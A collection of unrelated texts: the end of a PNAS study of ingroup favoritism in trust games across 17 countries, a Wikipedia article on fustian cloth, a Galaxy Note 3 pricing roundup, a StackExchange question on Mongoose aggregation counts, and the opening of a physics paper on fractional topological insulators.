on trustworthiness replicated the findings of trust behavior. SVO. {#s9} ---- People who were higher in prosocial value orientation engaged in greater trust behavior in general (*b* = 0.006; *P* \< 0.001), and prosocial individuals were not more inclined to discriminate in favor of ingroup members (*b* = −0.001; *P* = 0.12). We found the same result with trustworthiness decisions. People who were higher in prosocial value orientation also returned greater amounts to others when making return decisions (*b* = 0.14; *P* \< 0.001), without discriminating in favor of ingroup members (*b* = −0.02; *P* = 0.06). Gender. {#s10} ------- Men, compared with women, had higher levels of trust behavior across all of the conditions (*b* = 0.09; *P* = 0.01), and men also discriminated more in favor of ingroup members (*b* = 0.06; *P* = 0.005). Men, compared with women, also returned greater amounts as the trustee (*b* = 3.16; *P* \< 0.001), and men reciprocated similar amounts across partners with different group membership (*b* = 0.53; *P* = 0.10). Men, compared with women, expected more cooperation from others in general (*b* = 0.42; *P* \< 0.001), but men also expected greater cooperation from ingroup than outgroup members, (*b* = 0.13; *P* = 0.01). Outgroup Derogation. {#s11} -------------------- We created an additional contrast variable with partner's group membership to understand if people treated outgroup members less favorably than strangers (outgroup = 1; stranger = 0). People displayed greater trust behavior with outgroup members than strangers (*b* = 0.12; *P* \< 0.001) and also expected more cooperation from outgroup members than strangers (*b* = 0.27; *P* \< 0.001). People also returned more to outgroup members than strangers (*b* = 0.78; *P* = 0.02). Cross-Societal Variability in Ingroup Favoritism. {#s12} ------------------------------------------------- There was a small but significant amount of variation in ingroup favoritism in trust behavior across the 17 countries \[var(*u*~1j~) = 0.008, *P* \< 0.001\]. This cross-societal variation in ingroup favoritism in trust behavior was unrelated to cross-societal variables relevant to testing the material security hypothesis (e.g., rule of law, government effectiveness, and market competitiveness), religiosity hypothesis (e.g., frequency of religious attendance, prevalence of beliefs in heaven/hell, and the number of protestants), and parasite stress (e.g., historical disease prevalence index). Additionally, we did not observe that these cross-societal indices had consistent main effects on trust behavior, trustor expectations, or trustworthiness across interactions with ingroup members, outgroup members, and strangers. See [*SI Appendix*, Table S6](#d35e347){ref-type="supplementary-material"} for a full model with estimates of all of the cross-societal variables. Discussion {#s13} ========== Decades of social and biological research have attempted to explain the ultimate and proximate mechanisms underlying ingroup favoritism in cooperation. We tested some of the most prominent theories in a behavioral experiment conducted across 17 countries. A central theoretical issue is whether humans evolved a psychology that functions to harm outgroup members or favor ingroup members. Across the 17 countries, people were generally more willing to trust and cooperate with ingroup members than outgroup members and partners with unknown group membership (i.e., strangers). A motivation to harm the outgroup didn't produce this ingroup favoritism, since we did not observe greater cooperation with strangers than outgroup members. We proceeded to test several theories about why, who, and where people are more likely to display ingroup favoritism in cooperation. BGR claims that humans evolved to cooperate more with ingroup members, because groups contained a system of reputation-based indirect reciprocity ([@r4]). This perspective hypothesizes that people will cooperate more with ingroup members only when their reputation is at stake. Following previous work testing this theory, we manipulated reputational consequences of actions by manipulating common knowledge of group membership, and, indeed, previous research has found that people have elevated concerns about their reputation in the common vs. unilateral knowledge condition ([*SI Appendix*](#d35e347){ref-type="supplementary-material"}). When examining either trustor or trustee decisions to cooperate, we found that people cooperated more when their reputation was at stake, regardless of their partner's group membership. The effect of reputation on trust and cooperation was uniform across societies. Such a finding underscores the role of reputation-based indirect reciprocity in understanding human cooperation. Furthermore, the benefits of indirect reciprocity may also extend to interactions with outgroup members ([@r27]), and humans may have evolved to cooperate to maintain a cooperative reputation, even when interacting with outgroup members. A practical implication of this finding is that reputation-based cooperation can be a tool used to promote cooperation within and between groups. The effect of partner group membership on cooperation was partially mediated by expected partner cooperation. People tended to expect greater cooperation from ingroup members than outgroup members. Thus, at least some ingroup favoritism may be explained by a belief that people cooperate more with ingroup members. Furthermore, this belief generalized across all 17 countries and could not be explained by stereotypes of people from certain nationalities being more cooperative ([@r28]), and previous work suggests that the belief is not merely a byproduct of a positivity bias in thinking about ingroup members ([@r29]). Future research is necessary to understand the development and function of this belief in regulating cooperative interactions within and between groups. Men, compared with women, tended to discriminate their cooperation more in favor of ingroup members (although this was a small effect size). This supports the hypothesis that an ancestral social ecology characterized by patrilocality and male intergroup warfare may have produced a sex-typical coalitional psychology that promotes cooperation with groups. In fact, previous research has found that men, compared with women, tend to think groups are more important in defining their self-concept ([@r30]), are more cooperative in same-sex interactions ([@r31]), and display greater ingroup favoritism ([@r7]), even at a young age ([@r32]), and especially in the context of intergroup conflict ([@r3]). Although previous theory has claimed that social preferences for cooperation may be rooted in favoritism for ingroup members, we found that cooperative preferences, as measured by SVO, predicted cooperation equally with ingroup and outgroup members. Therefore, individual differences in cooperative preferences may not reflect a form of parochial cooperation, but a universal concern about other's outcomes. This finding supports recent research on SVO and intergroup cooperation ([@r33]) and challenges previous theorizing and research on the role of intergroup conflict in explaining individual differences in cooperative preferences ([@r2]). How these individual differences in cooperative preferences arise over the course of development and are maintained within the human population provides two scientific puzzles yet to be solved. We found only a small amount of variation in ingroup favoritism in trust and cooperation across the 17 countries. And the little variation that did exist was not explained by three theories of cross-cultural variation in ingroup favoritism, with each theory forwarding a hypothesized interaction between ecological conditions (e.g., quality of societal institutions, religious history, and pathogen stress) and the amount of ingroup favoritism. Furthermore, none of these cross-societal variables were associated with trust, trustor expectations, and trustworthiness across interactions with ingroup members, outgroup members, and strangers. These findings have both theoretical and practical implications. First, these findings are in contrast with past research that found rule of law, government efficiency, religiosity, and pathogen stress promote trust and cooperation between strangers ([@r20][@r21][@r22]--[@r23]). Even though we found a significant positive correlation between self-reported trust and trust behavior in our experiment across societies (*r* = 0.19), we failed to replicate findings from previous cross-societal research that has relied primarily on self-reports of ingroup favoritism (e.g., collectivism) ([@r15][@r16]--[@r17]). This result supports recent research on the gap between self-report and behavioral measures ([@r34]). Second, these findings suggest that the psychological processes that promote trust and cooperation between strangers and ingroup members (at least in an online environment) may be less sensitive to variations in social ecologies that occur in modern societies. Therefore, practitioners interested in promoting intergroup cooperation under such circumstances (e.g., social media ratings of services or trading sites like Craigslist) can focus more on general processes rather than on the specific social ecologies where discrimination occurs. The lack of cross-societal variation reported here could be due to limitations of the study, such as a small number of countries, the type of groups used to study discrimination, and using an online social exchange task. That said, we included a wide range of different countries; nationality is an important natural group for individuals; and cross-societal variation in behavior in the trust game positively correlated with self-reported trust across countries. To summarize, we observed that people extend greater trust and cooperation to ingroup members compared with outgroup members and unknown others and that this was produced by a motivation to benefit ingroup members as opposed to harm outgroup members. Men were more likely to display this ingroup favoritism than women. However, individual differences in cooperative preferences did not predict who engaged in greater ingroup favoritism. This suggests that these individual differences in cooperative preferences are less parochial and more general, predicting concern even for the outcomes of outgroup members. We found that a manipulation of reputational concern produced a uniform increase in cooperation with both ingroup and outgroup members across all 17 countries. Thus, reputation-based cooperation may be a pervasive human universal that is not bounded by interactions with ingroup members, but also extends to regulating interactions with outgroup members, at least in cyberspace. We observed little variation in the amount of ingroup favoritism across 17 countries, and we did not find support for three prominent theories that explain cross-societal variation in the amount of ingroup favoritism in cooperation. Together, the results of this study demand an extensive refining of existing explanations of why, who, and where people display ingroup favoritism in cooperation. Methods {#s14} ======= The research was approved by the Massey University Human Ethics Committee: Northern Application MUHECNNOR 16/31. All data and translation materials are openly accessible at <https://osf.io/r8kwt/>. Participants. {#s15} ------------- We recruited 3,236 participants from 17 countries ([*SI Appendix*, Table S1](#d35e347){ref-type="supplementary-material"}). Participants were recruited through The Nielsen Company, an international polling agency based in the United States. Participants were stratified according to age, gender, and region of residence. We only invited participants who completed each of the previous two waves of the study (for detailed characteristics and recruitment of the wave 1 sample, see ref. [@r35]). Procedure and Experimental Design. {#s16} ---------------------------------- Participants responded to an online survey. The initial version of the survey was written in English, and then each survey was translated (and back-translated) by experts in the language (or the committee method was used). The procedure of the experiment was the same across countries. First, participants were asked to agree with an informed consent form. Next, they read the instructions of the trust game, which involved two roles: the trust person and the return person. We used the term "trust person" in the instructions to standardize the framing of the task across countries. Finally, participants were asked to make 14 one-shot decisions (see [*SI Appendix*](#d35e347){ref-type="supplementary-material"} for a full description of the instructions and each decision). Participants made decisions both as a trust and a return person. We manipulated two aspects of the decision task. Specifically, the study involved a 3 (ingroup vs. outgroup vs. stranger) × 2 (common vs. unilateral knowledge) within-subjects design. We also included two additional decisions in which all participants interacted with a person they knew was American or Chinese. These latter two conditions were included to address a research question not discussed in this work and were not included in the analyses reported here. The 14 choices were randomized for each participant ([Table 1](#t01){ref-type="table"}). Two countries \[United Kingdom (UK) and South Korea (SK)\] also included a between-subjects manipulation of paid vs. hypothetical decisions (see below). ###### Decisions made by each participant during the experiment D Role Group membership Common/unilateral knowledge ------------------------------------ --------- ------------------ ----------------------------- 1 Trustor Ingroup Common knowledge 2 Trustor Ingroup Unilateral knowledge 3 Trustor Outgroup Common knowledge 4 Trustor Outgroup Unilateral knowledge 5 Trustor Stranger Unilateral knowledge 6 Trustee Ingroup Common knowledge 7 Trustee Ingroup Unilateral knowledge 8 Trustee Outgroup Common knowledge 9 Trustee Outgroup Unilateral knowledge 10 Trustee Stranger Unilateral knowledge 11[\*](#tfn1){ref-type="table-fn"} Trustor China Common knowledge 12[\*](#tfn1){ref-type="table-fn"} Trustee China Common knowledge 13[\*](#tfn1){ref-type="table-fn"} Trustor United States Common knowledge 14[\*](#tfn1){ref-type="table-fn"} Trustee United States Common knowledge For each participant, the order of the decisions was randomized. D, decision; trustee, trustworthiness decision; trustor, trust behavior decision. These decisions were included for a research question and project not included in this work. Payment. {#s17} -------- Participants' decisions in the trust game were based on hypothetical outcomes. A previous meta-analysis of \>100 studies found that people display the same amount of ingroup favoritism in cooperation in studies that use hypothetical and paid outcomes ([@r7]). Nonetheless, we decided to examine this in our own experiment by adding a manipulation of participant payment (payment vs. hypothetical outcomes) in two countries, UK and SK. In the payment condition, participants' decisions had monetary consequences. The value of MUs was standardized across countries by having each MU amount to 5 min of the median hourly wage in a specific country (median hourly wage was retrieved from [www.salaryexplorer.com/hourly-wage.php?&loctype=1&loc= 107](http://www.salaryexplorer.com/hourly-wage.php?&loctype=1&loc=%20107)). For the UK, each MU corresponded to \$2.03, while for SK, each MU was \$1.79. Participants were informed that at the end of the experiment, they would be paid for the outcome of one of their decisions that would be randomly selected from all 14 decisions. For each decision, they would be randomly matched with a different participant and paid within 2 wk. In the outgroup partner and stranger condition, we selected a partner from the entire sample of countries that were not paid for their decisions. In the hypothetical payment condition, the decisions had hypothetical outcomes worth the same value. We were interested if people would display more or less ingroup favoritism in the payment condition vs. the hypothetical payment condition, but we did not find a significant interaction between the payment conditions and partner group membership (contrast 1) predicting trust behavior (*P* = 0.62), trustor expectations (*P* = 0.70), and trustworthiness (*P* = 0.67). Details on these models can be found in [*SI Appendix*, Table S7](#d35e347){ref-type="supplementary-material"}. Therefore, based on these analyses and the outcome of a previous meta-analysis, we concluded that the use of hypothetical payments does not affect ingroup favoritism. Gender. {#s18} ------- Gender was measured in both waves 1 and 2, and we matched these measures to minimize the missing cases across the waves. The total sample contained 47.30% women ([*SI Appendix*, Table S1](#d35e347){ref-type="supplementary-material"}). SVO. {#s19} ---- A measure of SVO was administered in wave 2. We used the SVO slider, a six-item measure where participants are asked to state their preference of monetary allocations between themselves and another anonymous person ([@r9]). The final score was the inverse tangent of the ratio between the mean allocation for the self (subtracted by 50) and the mean allocations to the other (subtracted by 50). Higher scores in the SVO angle represent individuals with higher cooperative preferences. Cross-Societal Variables. {#s20} ------------------------- We coded several cross-societal variables that could possibly moderate the amount of ingroup favoritism in cooperation. The coded variables used to test each hypothesis about cross-societal variation can be found in [*SI Appendix*, Table S5](#d35e347){ref-type="supplementary-material"}. The main sources were the World Value Survey and the World Data Bank. We also coded some additional variables for exploratory purposes, such as nepotism, collectivism, and norms of cooperation (see [*SI Appendix*](#d35e347){ref-type="supplementary-material"} for additional details). When testing our models, we also controlled for economic wealth (per capita gross domestic product) and inequality (Gini). Analytical Strategy. {#s21} -------------------- We used multilevel models where participants (level 2) and countries (level 3) were two random factors. These models considered random intercepts for participants nested in countries and also random slopes for the effect of group membership across the different countries. This model was selected after comparing this model with other models through the Akaike information criteria and the Bayesian information criteria ([@r36]). For trustworthiness behavior, we transformed each possible return choice to a percentage. Then, we computed the mean across the five return behavior scenarios (finale scale: 0--100). Data were analyzed with R (lme4 package) by using random intercept and slopes ([@r37]). We used contrast 1 (ingroup vs. outgroup and strangers), contrast 2, and common/unilateral knowledge as level-1 predictors in the models. Gender and SVO were level-2 predictors in the models. We allowed the effects of contrast 1 to vary across level 3. We didn't allow the effects of common/unilateral knowledge to vary across level 3, since this did not vary significantly across countries (*P* = 0.94). Therefore, our model can be described by the following equation (*Y*~*ijk*~ can be a measure of trust behavior, trustor expectations, or trustworthiness):$${Level}1:\mathit{Y}_{\mathit{ijk}} = \beta_{0\mathit{jk}} + \beta_{1\mathit{jk}}{CONTRAST}1_{\mathit{ijk}} + \mathit{\beta}_{2\mathit{jk}}{KNOWLEDG}E_{\mathit{ijk}} + \mathit{\beta}_{3\mathit{jk}}{CONTRAST}1_{\mathit{ijk}}{KNOWLEDG}E_{\mathit{ijk}} + \mathit{e}_{\mathit{ijk}}$$$$\begin{array}{r} {{Level}2:\beta_{0\mathit{jk}} = \gamma_{00\mathit{k}} + \gamma_{01\mathit{k}}{GENDE}R_{\mathit{jk}} + \gamma_{02\mathit{k}}{SV}O_{\mathit{jk}} + \mathit{f}_{0\mathit{jk}};} \\ {\beta_{1\mathit{jk}} = \gamma_{10\mathit{k}} + \gamma_{11\mathit{k}}{GENDE}R_{\mathit{jk}} + \gamma_{12\mathit{k}}{SV}O_{\mathit{jk}} + \mathit{f}_{1\mathit{jk}}} \\ \end{array}$$$$\begin{array}{r} {{Level}3:\gamma_{00\mathit{k}} = \delta_{000} + \mathit{g}_{\mathit{0k}}} \\ {\gamma_{10\mathit{k}} = \delta_{100} + \mathit{g}_{\mathit{1k}}} \\ \end{array}$$ In the cross-cultural analysis, country level variables were level-2 predictors in our model. In this case, the model includes random intercepts for countries and also random slopes for the effect of group membership across the different countries:$${Level}1:\mathit{Y}_{\mathit{ij}} = \beta_{0\mathit{j}} + \beta_{1\mathit{j}}{CONTRAST}1_{\mathit{ij}} + \mathit{\beta}_{2\mathit{j}}{KNOWLEDG}E_{\mathit{ij}} + \mathit{\beta}_{3\mathit{j}}{CONTRAST}1_{\mathit{ij}}{KNOWLEDG}E_{\mathit{ij}} + \mathit{e}_{\mathit{ij}}$$$$\begin{array}{r} {{Level}2:\beta_{0\mathit{j}} = \gamma_{00} + \gamma_{0{({1..\mathit{n}})}}\left( {{SOCIETAL\_ VARIABL}E_{\mathit{n}}} \right)_{\mathit{j}} + \mathit{f}_{0\mathit{j}};} \\ {\beta_{1\mathit{j}} = \gamma_{10} + \gamma_{1{({1..\mathit{n}})}}\left( {{SOCIETAL\_ VARIABL}E_{\mathit{n}}} \right)_{\mathit{j}} + \mathit{f}_{1\mathit{j}}} \\ \end{array}$$ The SOCIETAL_VARIABLE term represents the many societal variables used to test our hypotheses ([*SI Appendix*, Table S5](#d35e347){ref-type="supplementary-material"}). The correspondent R code for each model can be found in [*SI Appendix*](#d35e347){ref-type="supplementary-material"}. Additionally, we meta-analyzed the level-1 predictors to infer the population-level effect size of contrast 1 and common/unilateral knowledge on trust behavior. These analyses were carried out by using the R package metafor ([@r38]), and each country was treated as a different sample. Finally, we used the R package mediation to run the multilevel mediation model ([@r39]). Supplementary Material ====================== This work was supported by Asian Office of Aerospace Research and Development Grant FA2386-15-1-0003 and Japan Society for the Promotion of Science Grant 15H05730. The authors declare no conflict of interest. This article is a PNAS Direct Submission. Data deposition: All data and translation materials are openly accessible at <https://osf.io/r8kwt/>. This article contains supporting information online at [www.pnas.org/lookup/suppl/doi:10.1073/pnas.1712921114/-/DCSupplemental](http://www.pnas.org/lookup/suppl/doi:10.1073/pnas.1712921114/-/DCSupplemental). [^1]: Edited by Susan T. Fiske, Princeton University, Princeton, NJ, and approved October 10, 2017 (received for review July 20, 2017) [^2]: Author contributions: A.R., D.B., T.Y., and J.H.L. designed research; A.R., D.B., T.Y., and J.H.L. performed research; A.R. analyzed data; and A.R., D.B., T.Y., and J.H.L. wrote the paper.
{ "pile_set_name": "PubMed Central" }
Fustian Fustian is a variety of heavy cloth woven from cotton, chiefly prepared for menswear. It is also used figuratively to refer to pompous, inflated or pretentious writing or speech, from at least the time of Shakespeare. This literary use is because the cloth type was often used as padding, hence, the purposeless words are fustian. History and use Known in Late Latin as fustaneum or fustanum and in Medieval Latin as pannus fustāneus ('fustian cloth') or tela fustānea ('fustian mesh'), the cloth is possibly named after the Egyptian city of Fustat near Cairo that manufactured such a material. It embraces plain twilled cloth known as jean, and cut fabrics similar to velvet, known as velveteen, moleskin, corduroy etc. The original medieval fustian was a stout but respectable cloth with a cotton weft and a linen warp. The term seems to have quickly become less precise, and was applied to a coarse cloth made of wool and linen, and in the reign of Edward III of England, the name was given to a woolen fabric. By the early 20th century, fustians were usually of cotton dyed various colors. In a petition to Parliament during the reign of Mary I, "fustian of Naples" is mentioned. In the 13th and 14th centuries priests' robes and women's dresses were made of fustian, but though dresses are still made from some kinds, the chief use is for labourers' clothes. Fustian, by the 1860s referred to any cut weft cotton fabric, and its manufacture was common in towns of the fringe of the Lancashire cotton region, such as Congleton in Cheshire, Mow Cop, Staffordshire and Heptonstall in Calderdale. From 1800 to 1850 it was commonly called Baragan Fustian, and much used in Australia. Manufacture Crucial to process of manufacture was fustian cutting. This was a laborious process using a fustian cutting knife. This tool was around 50 cm long, and looked like a long spike; about 10 cm from the tip, the top edge was sharpened into a blade. It was inserted along the fabric alongside two warp threads, and under the raised weft, and as it was guided forward the blade severed the weft. In corduroy, there were seven ridges to the inch, so along a 31in bolt, there would be about 320 cuts to be done. In the 1860s, the cloth would be stretched over a 22yd long table, and the cutters would walk the length of the table as many times as was necessary, in recent times the cloth was tensioned over a 6 ft table and all the cuts made, and then the cloth would be released and the next two yards tensioned onto the table. Over a 60hr week the cutter would be expected to produce 500 yards of 7–8 ridge corduroy. Velveteen was cut the same way but had 32 ridges per inch so production would be proportionately less. Cutting was one part of the process. The yarn was sized and the cloth was woven—there would be a high number of weft threads to warp. The ridges were manually cut, and the cloth sent to be finished. It was scoured to remove the size, and brushed to raise the nap. This was then singed over a gas flame, then bleached and or dyed. It was brushed again. It was now stentered to pull it out to the standard width. The cloth was woven at 31 or 32 inches and during processing has shrunk to 27 inches. Stentering would stabilise the width to 28 inches. The back of the cloth would now be filled to give it stiffness. This could be with a glue based mixture that could be formed from boiled bones. Each manufacturer had its own techniques. The cloth was now ready to be taken to the warehouse to be sold. Political significance Fustian was worn by workers during the 19th century. Accordingly, radical elements of the British working class chose to wear fustian jackets as a symbol of their class allegiance. This was especially marked during the Chartist era. The historian Paul Pickering has called the wearing of fustian "a statement of class without words." Fustian also refers to pompous, inflated or pretentious writing or speech, starting from the time of Shakespeare. This literary use arose because the cloth type was often used as padding, hence, the purposeless words are fustian. Bombast, cotton used directly as padding (and not as fabric), similarly refers to grandiloquence by extension. See also Evolution of blue jeans Fustanella, a skirt-like men's garment Notes References Pickering, Paul, A., "Class Without Words: Symbolic Communication in the Chartist Movement", Past and Present, cxii, August 1986, 144–162. External links Category:Woven fabrics Category:Pile fabrics Category:Cotton industry Category:Linen industry Category:British clothing
{ "pile_set_name": "Wikipedia (en)" }
The Samsung Galaxy Note 3 will soon be on the U.S. market, and with that news comes several availability options. Not only will customers have several mobile carries from which to choose when purchasing their Note 3 handsets, but many retailers will also have the Note 3 available. Here is all the current information available on Galaxy Note 3 availability and pricing for U.S. carriers and retailers. T-Mobile T-Mobile will have the 32GB Samsung Galaxy Note 3 available in stores starting Oct. 2; pre-orders will ship on or before Oct. 2. Available in Jet Black and Classic White color options, the T-Mobile Galaxy Note 3 will cost $199.99 upfront with 24 monthly payment of $21. Customers can also pay for the T-Mobile Galaxy Note 3 at full price for $703.99. The Samsung Galaxy Gear companion device is sold separately for $299. AT&T will have the 32GB Samsung Galaxy Note 3 available in stores starting Oct. 4; pre-orders will ship on Oct. 1. Available in Jet Black and Classic White color options, the AT&T Galaxy Note 3 will cost $299.99 with a two-year contract and $549.99 with one-year contract. Customers can also pay for the AT&T Galaxy Note 3 in 20 monthly payments of $35 or at full price for $724.99. The Samsung Galaxy Gear companion device is sold separately for $299. Sprint will have the 32GB Samsung Galaxy Note 3 available online and in stores starting Oct. 4; the carrier is not accepting pre-orders for the Galaxy Note 3. Information on color options is not yet known, but the Sprint Galaxy Note 3 will cost $349.99 with a two-year contract. Full retail pricing is also currently not known. The Samsung Galaxy Gear companion device is sold separately for $299. Verizon will begin shipping pre-orders for the 32GB Samsung Galaxy Note 3 on or before Oct. 10; when in-store availability will begin is not yet known. Available in Jet Black and Classic White color options, the Verizon Galaxy Note 3 will cost $299.99 with a two-year contract. Customers can also pay for the Verizon Galaxy Note 3 at full price for $699.99. The Samsung Galaxy Gear companion device is sold in a bundle with the Verizon Galaxy Note 3 for $599.98 with a new two-year contract and at full price for $999.98. U.S. Cellular has announced that it will begin offering the 32GB Samsung Galaxy Note 3 in October; however, no pre-order, release date, or price information has been made available to the public. U.S. Cellular Galaxy Note 3 Color options and Samsung Galaxy Gear availability is also not yet known. Amazon currently has the unlocked 32GB Samsung Galaxy Note 3 available in Jet Black and Classic White color options for varying prices above $750. The Samsung Galaxy Gear companion device is also available for pre-order for $453 and will ship Oct. 4. Best Buy currently has the 32GB Verizon, AT&T and Sprint models of the Samsung Galaxy Note 3 available for pre-order with two-year contacts at their respective carrier prices. Available in Jet Black and Classic White color options, the AT&T and Sprint Galaxy Note 3 models will ship on Oct. 4 while the Verizon Galaxy Note 3 does not yet have a shipping date. The Samsung Galaxy Gear companion device is also available for pre-order for $299.99; however, its shipping date is not yet known. Radio Shack will begin offering the 32GB AT&T and Sprint Samsung Galaxy Note 3 models on Oct. 4 with two-year contacts at their respective carrier prices. In addition, RadioShack is offering its “Trade and Save” program for the Galaxy Note 3, which will allow Galaxy Note 2 owners to trade in their device for $175 off the price of the Galaxy Note 3, while owners of the original Galaxy Note will receive $100 with a trade. From which carrier and/or retailer will you be buying your Samsung Galaxy Note 3? Let us know in the comments below. A white Fiat van rammed into pedestrians outside enjoying a late afternoon stroll on Las Ramblas in Barcelona on Thursday killing at least 13 people and leaving hundreds injured. The Islamic State group claimed responsibility for the attack.
{ "pile_set_name": "Pile-CC" }
Q: Mongoose count embed array elements with aggregate I'm currently trying to achieve something that would be trivial in SQL, but is really painful with Mongoose/MongoDb 3.3. I have a collection of conversations. A conversation is started by an issuer and is made of zero or more messages. the messages are exchanged between the issuer and a user and are stored in a messages array. My chore is pretty easy, count the number of unread messages for a given issuer. A single conversation for one issuer might read as follow : { "_id" : ObjectId("578caba0264f76ec80d87e7c"), "issuer" : ObjectId("578c9c68261246f717343ab7"), "messages" : [ { "content" : "Hi !", "type" : "text", "user" : ObjectId("56582b17b380912011c485e2"), "_id" : ObjectId("578caba08cf9a9081927e326"), "createdAt" : ISODate("2016-07-18T10:12:48.778Z"), "seenAt" : ISODate("2016-07-18T10:13:16.725Z") }, { "content" : "Wassup ?", "type" : "text", "user" : ObjectId("569a9d343bd9840e26797412"), "_id" : ObjectId("578cabcb8cf9a9081927e327"), "createdAt" : ISODate("2016-07-18T10:13:31.254Z"), "seenAt" : ISODate("2016-07-18T10:13:34.133Z") }, { "content" : "Fine, ya ?", "type" : "text", "user" : ObjectId("569a9d343bd9840e26797412"), "_id" : ObjectId("578cabd38cf9a9081927e328"), "createdAt" : ISODate("2016-07-18T10:13:39.573Z") } } } What I tried so far is use a Mongoose aggregation : function findUnreadByIssuerId(issuerId) { return Conversation .aggregate() .match({ issuer: issuerId }) .unwind('messages') .match({'messages.seenAt' : { $exists: 'false'} }) .count() .exec(); } The point here is that nodejs complains about count() not being a function. The aggregations seems otherwise ok, since if I remove the count() I get an array. Then, I tried to use $group but I'm a newcomer to Mongo and its grouping and I'm getting an empty array : return Conversation .aggregate([ { $match: { issuer: issuerId } }, { $unwind: '$messages' }, { $match: {'messages.seenAt' : { $exists: 'false'} } }, { $group: { _id: '$messages.createdAt', count: { $sum: 1 } }} ]) .exec(); In the example provided, the expected result to the call would be 2 ideally. But I can handle a { sum: 2} although not ideal. What is wrong with my Mongoose aggregate chain ? A: For Mongo >= 3.4: You should provide an argument to $count , which is the name of the column of the count . https://docs.mongodb.com/manual/reference/operator/aggregation/count/ Use it like: .count("total_unseen") its not returning an integer but an object {total_unseen: 1} For Mongo < 3.4 Use $group and count: { $group: null, count: {$sum: 1} } Regard the result: If one of the stages in the pipeline is empty , the result will be empty, but usually the driver is casting into more proper value . So for both method , when the count is 0 , the result will be empty array or null. (depends on the driver)
{ "pile_set_name": "StackExchange" }
--- abstract: '[ For example, the low-energy theory of the two-dimensional (2D) toric code model [(i.e. the deconfined phase of $\mathbb{Z}_2$ gauge theory)]{} is a $U(1)\times U(1)$ Chern-Simons theory in which gauge charges (i.e., $e$ and $m$ particles) are deconfined and the gauge fields are gapped, while the confined phase is topologically trivial. In this paper, we point out a new route to [constructing exotic 3D gapped fermionic]{} phases [in a confining phase of a gauge theory]{}. [Starting from a parton construction with strongly fluctuating compact $U(1)\times U(1)$ gauge fields, we construct gapped phases of interacting fermions]{} by condensing two linearly independent bosonic composite particles [consisting]{} of partons and $U(1)\times U(1)$ magnetic monopoles. [This]{} can be regarded as a 3D generalization of the 2D Bais-Slingerland condensation mechanism. Charge fractionalization [results]{} from a Debye-Hückel-like screening cloud formed by the condensed composite particles. [Within our general framework, we explore two aspects of symmetry-enriched]{} 3D Abelian topological phases. First, [we construct a new fermionic state of matter with time-reversal symmetry and $\Theta\neq \pi$, the fractional topological insulator]{}. Second, we generalize the notion of *anyonic symmetry* of 2D Abelian topological phases to the *charge-loop excitation symmetry* ($\mathsf{Charles}$) [of]{} 3D Abelian topological phases. [We show that line twist defects, which realize $\mathsf{Charles}$ transformations, exhibit non-Abelian fusion properties.]{}]{}' author: - Peng Ye - 'Taylor L. Hughes' - Joseph Maciejko - Eduardo Fradkin title: '[Composite Particle Theory of Three-dimensional Gapped Fermionic Phases: Fractional Topological Insulators and Charge-Loop Excitation Symmetry ]{}' --- Introduction ============ Background and overview: Parton construction and gauge confinement ------------------------------------------------------------------ In models of non-interacting fermions, several topological phases of matter have been found, such as integer quantum Hall states (IQH), Chern insulators, and topological insulators (TI)[@iqh; @haldane88; @TI1; @TI2; @TI3; @TI4; @TI5; @TI6; @TIexp]. Owing to the non-interacting nature of the problem, tremendous progress has been made in both theory and experiment. In the presence of weak interactions these phases can also be analytically understood. If interactions are strong enough such that a perturbative analysis is no longer meaningful, one usually faces a problem in strongly-correlated electron physics. While exact solutions are possible in a few specific models, one often constructs approximate effective descriptions of such systems. One such approach is the parton construction approach, also known as the projective construction, or slave-particle approach. It has been widely applied in studies of strongly correlated electron systems such as high-temperature superconductors and fractional quantum Hall states (FQH).[@BZA8773; @BA8880; @AM8874; @KL8842; @SHF8868; @AZH8845; @DFM8826; @WWZcsp; @Wsrvb; @LN9221; @MF9400; @WLsu2; @WenRMP; @weng; @ye10; @ye11a; @ye_zhang; @ye_ma; @ye_wang; @jain_parton; @wen_parton; @Wen99; @Barkeshli2010] Recently, it has also been applied [@LL1263; @YW12; @YW13a; @Wangsenthil2015; @Ye14b] to bosonic symmetry-protected topological phases (SPT) as well.[@1DSPT; @Chenlong; @Chen_science; @Chen10] Generally speaking, in the parton construction we start with a lattice action $S$ that describes a strongly-correlated electronic system. In this paper, the electron operator $c$ is meant to represent a generic Grassmann variable that is the only dynamical variable in $S$. We further write the electron operator $c$ in terms of several parton operators $f^i$. The Hilbert space for $S$ is equivalently replaced by a projected Hilbert space formed by partons and gauge fields. In practice, there are many different kinds of parton constructions. We focus on one of them, where all partons are fermionic such that an odd number of partons is required to form an electron. Mathematically, the electron operator is formally fractionalized as $c=f^1f^2\cdots f^{2n+1}$. The electron operator $c$ is a singlet of the $SU(2n+1)$ gauge group. The largest totally commuting subgroup, or maximal torus, is given by the compact Abelian $(U(1))^{2n}$ gauge group which acts with gauge transformations: $f^1\rightarrow f^1e^{i\theta_1},\cdots, f^i\rightarrow f^ie^{i\theta_{i}-i\theta_{i-1}},\cdots, f^{2n+1}\rightarrow f^{2n+1}e^{-i\theta_{2n}}$, where $\{\theta_i\}$ ($i=1,2,\cdots,2n$) are arbitrary functions of the lattice sites and a continuous time variable. As such, by applying the ’t Hooft gauge projection,[@Gauge_Confinement_tHooft3] the lattice action deep in the confined phase is reformulated to describe a system of interacting partons and $2n$ dynamical compact abelian gauge fields $\{a^{(i)}_\mu\}$. It should be noted that the gauge-field coupling constants $g_i$ at the lattice scale should be treated as being very strong since the usual lattice kinetic terms (with coefficient $1/g^2_i$) for compact gauge fields are not present in $S$. From here one can usually proceed further by assuming a mean-field theory of partons where the effects of gauge fluctuations are assumed negligible. As such, a very important feature—the compactness of gauge fields—is totally ignored. A standard perturbative analysis can be applied in order to quantitatively recover the effect of gauge fluctuations at leading order. In some cases, this assumption is legitimate. A typical example is a 2D system where fermionic partons occupy energy bands with non-zero Chern number at the mean-field level.[@YW12] In this case, a Chern-Simons term is generated and a topological mass gap[@csgap] for the gauge fields is produced, which suppresses instanton tunneling. However, there is no reason to rule out the possibility that $g$ at low energies flows to strong coupling, such that the compactness of the gauge fields plays a fundamental role in reshaping the nature of the emergent ground states. In such cases, mean-field theories of partons fail to describe the physical states formed by electrons, even at a qualitative level. Despite the strong coupling nature of the problem, the leading order effect of gauge fluctuations can still be perturbatively treated by considering the Bose-Einstein condensation of composite particles. In the regime of strong gauge coupling, condensed composites contain magnetic monopoles of the internal compact gauge fields (and possible electric gauge charge as well). Historically, this line of thinking was developed in the context of strongly coupled gauge theories. For example, condensed monopole phases are relevant for studies of (3+1)D compact quantum electrodynamics, the Georgi-Glashow models, and supersymmetric Yang-Mills 